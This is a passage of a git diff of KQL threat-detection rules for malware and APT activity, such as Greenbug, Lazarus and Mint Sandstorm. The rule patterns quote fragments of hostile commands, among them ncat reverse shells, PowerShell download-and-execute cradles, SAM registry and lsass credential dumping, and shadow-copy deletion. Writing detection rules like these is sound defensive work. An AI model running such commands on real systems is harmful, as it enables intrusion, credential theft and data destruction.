+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessCommandLine contains "Chrome" or InitiatingProcessCommandLine contains "Edge" or InitiatingProcessCommandLine contains "Firefox" or InitiatingProcessCommandLine contains "Opera" or InitiatingProcessCommandLine contains "Brave" or InitiatingProcessCommandLine contains "Vivaldi") and (InitiatingProcessCommandLine contains "\\AppData\\Local\\Temp" and InitiatingProcessCommandLine contains ".zip" and InitiatingProcessCommandLine contains "update" and InitiatingProcessCommandLine contains ".js") and InitiatingProcessFolderPath endswith "\\wscript.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql b/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql
index 3c133795..e28c09b4 100644
--- a/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql
+++ b/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql
@@ -1,12 +1,12 @@
-// Title: File Creation Related To RAT Clients
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024-12-19
-// Level: high
-// Description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Legitimate software creating a file with the same name
-
-DeviceFileEvents
+// Title: File Creation Related To RAT Clients
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-12-19
+// Level: high
+// Description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Legitimate software creating a file with the same name
+
+DeviceFileEvents
 | where FolderPath contains "\\AppData\\Roaming\\" and ((FolderPath contains "\\mydata\\" or FolderPath contains "\\datalogs\\" or FolderPath contains "\\hvnc\\" or FolderPath contains "\\dcrat\\") and (FolderPath endswith "\\datalogs.conf" or FolderPath endswith "\\hvnc.conf" or FolderPath endswith "\\dcrat.conf"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql b/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql
index ae2317ff..a008eaeb 100644
--- a/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql
+++ b/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql
@@ -1,10 +1,10 @@
-// Title: Fireball Archer Install
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-06-03
-// Level: high
-// Description: Detects Archer malware invocation via rundll32
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Fireball Archer Install
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-06-03
+// Level: high
+// Description: Detects Archer malware invocation via rundll32
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "InstallArcherSvc"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql b/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql
index 7e07a4b4..50561a0f 100644
--- a/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql
+++ b/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql
@@ -1,12 +1,12 @@
-// Title: Goofy Guineapig Backdoor IOC
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-14
-// Level: high
-// Description: Detects malicious indicators seen used by the Goofy Guineapig malware
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Goofy Guineapig Backdoor IOC
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-14
+// Level: high
+// Description: Detects malicious indicators seen used by the Goofy Guineapig malware
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath in~ ("C:\\ProgramData\\GoogleUpdate\\config.dat", "C:\\ProgramData\\GoogleUpdate\\GoogleUpdate.exe", "C:\\ProgramData\\GoogleUpdate\\GoogleUpdate\\tmp.bat", "C:\\ProgramData\\GoogleUpdate\\goopdate.dll")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql b/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql
index 3abe5dce..3dc358a5 100644
--- a/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql
+++ b/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql
@@ -1,12 +1,12 @@
-// Title: Greenbug Espionage Group Indicators
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-05-20
-// Level: critical
-// Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
-// MITRE Tactic: Execution
-// Tags: attack.g0049, attack.execution, attack.t1059.001, attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1036.005, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Greenbug Espionage Group Indicators
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-20
+// Level: critical
+// Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
+// MITRE Tactic: Execution
+// Tags: attack.g0049, attack.execution, attack.t1059.001, attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1036.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath endswith ":\\ProgramData\\adobe\\Adobe.exe" or FolderPath endswith ":\\ProgramData\\oracle\\local.exe" or FolderPath endswith "\\revshell.exe" or FolderPath endswith "\\infopagesbackup\\ncat.exe" or FolderPath endswith ":\\ProgramData\\comms\\comms.exe") or (ProcessCommandLine contains "-ExecutionPolicy Bypass -File" and ProcessCommandLine contains "\\msf.ps1") or (ProcessCommandLine contains "infopagesbackup" and ProcessCommandLine contains "\\ncat" and ProcessCommandLine contains "-e cmd.exe") or ProcessCommandLine contains "L3NlcnZlcj1" or (ProcessCommandLine contains "system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill" or ProcessCommandLine contains "-nop -w hidden -c $k=new-object" or ProcessCommandLine contains "[Net.CredentialCache]::DefaultCredentials;IEX " or ProcessCommandLine contains " -nop -w hidden -c $m=new-object net.webclient;$m" or ProcessCommandLine contains "-noninteractive -executionpolicy bypass 
whoami" or ProcessCommandLine contains "-noninteractive -executionpolicy bypass netstat -a")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql b/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql
index 892bdc57..1a12b33a 100644
--- a/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql
+++ b/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql
@@ -1,12 +1,12 @@
-// Title: Griffon Malware Attack Pattern
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-09
-// Level: critical
-// Description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Griffon Malware Attack Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-09
+// Level: critical
+// Description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\local\\temp\\" and ProcessCommandLine contains "//b /e:jscript" and ProcessCommandLine contains ".txt"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql b/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql
index bc79ef77..e99facbe 100644
--- a/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql
+++ b/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql
@@ -1,10 +1,10 @@
-// Title: Hermetic Wiper TG Process Patterns
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-25
-// Level: high
-// Description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.lateral-movement, attack.t1021.001, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Hermetic Wiper TG Process Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1021.001, detection.emerging-threats
+
+DeviceProcessEvents
 | where FolderPath endswith "\\policydefinitions\\postgresql.exe" or ((ProcessCommandLine contains "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp" or ProcessCommandLine contains " 1> \\\\127.0.0.1\\ADMIN$\\__16") or (ProcessCommandLine contains "powershell -c " and ProcessCommandLine contains "\\comsvcs.dll MiniDump " and ProcessCommandLine contains "\\winupd.log full"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql b/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql
index deb455f1..4da9174c 100644
--- a/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql
@@ -1,12 +1,12 @@
-// Title: Kalambur Backdoor Curl TOR SOCKS Proxy Execution
-// Author: Arda Buyukkaya (EclecticIQ)
-// Date: 2025-02-11
-// Level: high
-// Description: Detects the execution of the "curl.exe" command, referencing "SOCKS" and ".onion" domains, which could be indicative of Kalambur backdoor activity.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.command-and-control, attack.t1090, attack.t1573, attack.t1071.001, attack.t1059.001, attack.s0183, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Kalambur Backdoor Curl TOR SOCKS Proxy Execution
+// Author: Arda Buyukkaya (EclecticIQ)
+// Date: 2025-02-11
+// Level: high
+// Description: Detects the execution of the "curl.exe" command, referencing "SOCKS" and ".onion" domains, which could be indicative of Kalambur backdoor activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.t1090, attack.t1573, attack.t1071.001, attack.t1059.001, attack.s0183, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\curl.exe" and ProcessCommandLine contains ".onion" and (ProcessCommandLine contains "socks5h://" or ProcessCommandLine contains "socks5://" or ProcessCommandLine contains "socks4a://")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql
index 383669a1..c6787dd2 100644
--- a/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql
+++ b/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql
@@ -1,11 +1,11 @@
-// Title: Kapeka Backdoor Loaded Via Rundll32.EXE
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024-07-03
-// Level: high
-// Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe.
-// The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
-
-DeviceImageLoadEvents
+// Title: Kapeka Backdoor Loaded Via Rundll32.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: high
+// Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe.
+// The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceImageLoadEvents
 | where (FolderPath contains ":\\ProgramData" or FolderPath contains "\\AppData\\Local\\") and FolderPath matches regex "[a-zA-Z]{5,6}\\.wll" and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql b/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql
index 65b80b63..efd89ce0 100644
--- a/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql
+++ b/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql
@@ -1,14 +1,14 @@
-// Title: Katz Stealer DLL Loaded
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-05-22
-// Level: high
-// Description: Detects loading of DLLs associated with Katz Stealer malware 2025 variants.
-// Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.
-// The process that loads these DLLs are very likely to be malicious.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1129, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Katz Stealer DLL Loaded
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-05-22
+// Level: high
+// Description: Detects loading of DLLs associated with Katz Stealer malware 2025 variants.
+// Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.
+// The process that loads these DLLs are very likely to be malicious.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1129, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\katz_ontop.dll" or FolderPath endswith "\\AppData\\Local\\Temp\\received_dll.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql b/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql
index 1328975d..0f704d81 100644
--- a/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql
+++ b/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql
@@ -1,12 +1,12 @@
-// Title: Lace Tempest Cobalt Strike Download
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-11-09
-// Level: high
-// Description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Lace Tempest Cobalt Strike Download
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-09
+// Level: high
+// Description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-nop -w hidden -c IEX ((new-object net.webclient).downloadstring(" and ProcessCommandLine contains "/a')"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql b/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql
index 5dc1fe91..7b577400 100644
--- a/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql
+++ b/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql
@@ -1,12 +1,12 @@
-// Title: Lace Tempest File Indicators
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-11-09
-// Level: high
-// Description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Lace Tempest File Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-09
+// Level: high
+// Description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where (FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles.war" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\leave") or FolderPath contains ":\\Program Files\\SysAidServer\\tomcat\\webapps\\user."
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql b/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql
index 6f520623..4d901408 100644
--- a/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql
@@ -1,12 +1,12 @@
-// Title: Lace Tempest Malware Loader Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-11-09
-// Level: high
-// Description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Lace Tempest Malware Loader Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-09
+// Level: high
+// Description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where SHA256 startswith "B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql b/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql
index b582bc74..22ef6268 100644
--- a/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql
@@ -1,12 +1,12 @@
-// Title: Lazarus Group Activity
-// Author: Florian Roth (Nextron Systems), wagga
-// Date: 2020-12-23
-// Level: critical
-// Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
-// MITRE Tactic: Execution
-// Tags: attack.g0032, attack.execution, attack.t1059, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Lazarus Group Activity
+// Author: Florian Roth (Nextron Systems), wagga
+// Date: 2020-12-23
+// Level: critical
+// Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
+// MITRE Tactic: Execution
+// Tags: attack.g0032, attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "reg.exe save hklm\\sam %temp%\\~reg_sam.save" or ProcessCommandLine contains "1q2w3e4r@#$@#$@#$" or ProcessCommandLine contains " -hp1q2w3e4 " or ProcessCommandLine contains ".dat data03 10000 -p ") or (ProcessCommandLine contains "netstat -aon | find " and ProcessCommandLine contains "ESTA" and ProcessCommandLine contains " > %temp%\\~") or (ProcessCommandLine contains ".255 10 C:\\ProgramData\\IBM\\" and ProcessCommandLine contains ".DAT") or ((ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\RECYCLER\\") and (ProcessCommandLine contains " /c " and ProcessCommandLine contains " -p 0x")) or ((ProcessCommandLine contains ".bin," or ProcessCommandLine contains ".tmp," or ProcessCommandLine contains ".dat," or ProcessCommandLine contains ".io," or ProcessCommandLine contains ".ini," or ProcessCommandLine contains ".db,") and (ProcessCommandLine contains "rundll32 " and ProcessCommandLine contains "C:\\ProgramData\\"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql b/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql
index 63704116..558e1712 100644
--- a/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql
+++ b/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql
@@ -1,10 +1,10 @@
-// Title: MacOS FileGrabber Infostealer
-// Author: Jason Phang Vern - Onn (Gen Digital)
-// Date: 2025-09-12
-// Level: high
-// Description: Detects execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.002, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: MacOS FileGrabber Infostealer
+// Author: Jason Phang Vern - Onn (Gen Digital)
+// Date: 2025-09-12
+// Level: high
+// Description: Detects execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.002, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "FileGrabber" and ProcessCommandLine contains "/tmp"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql b/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql
index b2f62614..bb9bdb08 100644
--- a/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql
@@ -1,10 +1,10 @@
-// Title: MERCURY APT Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-08-26
-// Level: high
-// Description: Detects suspicious command line patterns seen being used by MERCURY APT
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.g0069, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: MERCURY APT Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-26
+// Level: high
+// Description: Detects suspicious command line patterns seen being used by MERCURY APT
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.g0069, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-exec bypass -w 1 -enc" and ProcessCommandLine contains "UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql b/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql
index f9bb6ba8..df62ad21 100644
--- a/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql
@@ -1,12 +1,12 @@
-// Title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
-// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
-// Date: 2023-04-20
-// Level: critical
-// Description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
+// Date: 2023-04-20
+// Level: critical
+// Description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (InitiatingProcessFolderPath contains "aspera" and InitiatingProcessFolderPath contains "\\ruby") and ((((ProcessCommandLine contains " echo " or ProcessCommandLine contains "-dumpmode" or ProcessCommandLine contains "-ssh" or ProcessCommandLine contains ".dmp" or ProcessCommandLine contains "add-MpPreference" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "csvhost.exe" or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "ekern.exe" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "iex(" or ProcessCommandLine contains "Invoke-Expression" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "set-MpPreference" or ProcessCommandLine 
contains "svhost.exe" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "usoprivate" or ProcessCommandLine contains "usoshared" or ProcessCommandLine contains "whoami") or (ProcessCommandLine matches regex "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\s+session")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe")) or (ProcessCommandLine contains "lsass" and (ProcessCommandLine contains "procdump" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "findstr")) or ((ProcessCommandLine contains "http" and FolderPath endswith "\\curl.exe") or (ProcessCommandLine contains "localgroup Administrators" and ProcessCommandLine contains "/add") or (ProcessCommandLine contains "net" and (ProcessCommandLine contains "user" and ProcessCommandLine contains "/add")) or ((ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableAntiSpyware" and ProcessCommandLine contains "\\Microsoft\\Windows Defender") or (ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableRestrictedAdmin" and ProcessCommandLine contains "CurrentControlSet\\Control\\Lsa")) or (ProcessCommandLine contains "E:jscript" or ProcessCommandLine contains "e:vbscript") or (ProcessCommandLine contains "vssadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadows") or (ProcessCommandLine contains "wbadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog") or (ProcessCommandLine contains "http" and FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "process call create") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "delete" and 
ProcessCommandLine contains "shadowcopy")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql b/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql
index e62e4237..30d8b440 100644
--- a/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql
@@ -1,10 +1,10 @@
-// Title: Mint Sandstorm - Log4J Wstomcat Process Execution
-// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
-// Date: 2023-04-20
-// Level: high
-// Description: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Mint Sandstorm - Log4J Wstomcat Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
+// Date: 2023-04-20
+// Level: high
+// Description: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe" and (not(FolderPath endswith "\\repadmin.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql b/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql
index dadbfc50..f77b004e 100644
--- a/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql
@@ -1,12 +1,12 @@
-// Title: Mint Sandstorm - ManageEngine Suspicious Process Execution
-// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
-// Date: 2023-04-20
-// Level: critical
-// Description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Mint Sandstorm - ManageEngine Suspicious Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
+// Date: 2023-04-20
+// Level: critical
+// Description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
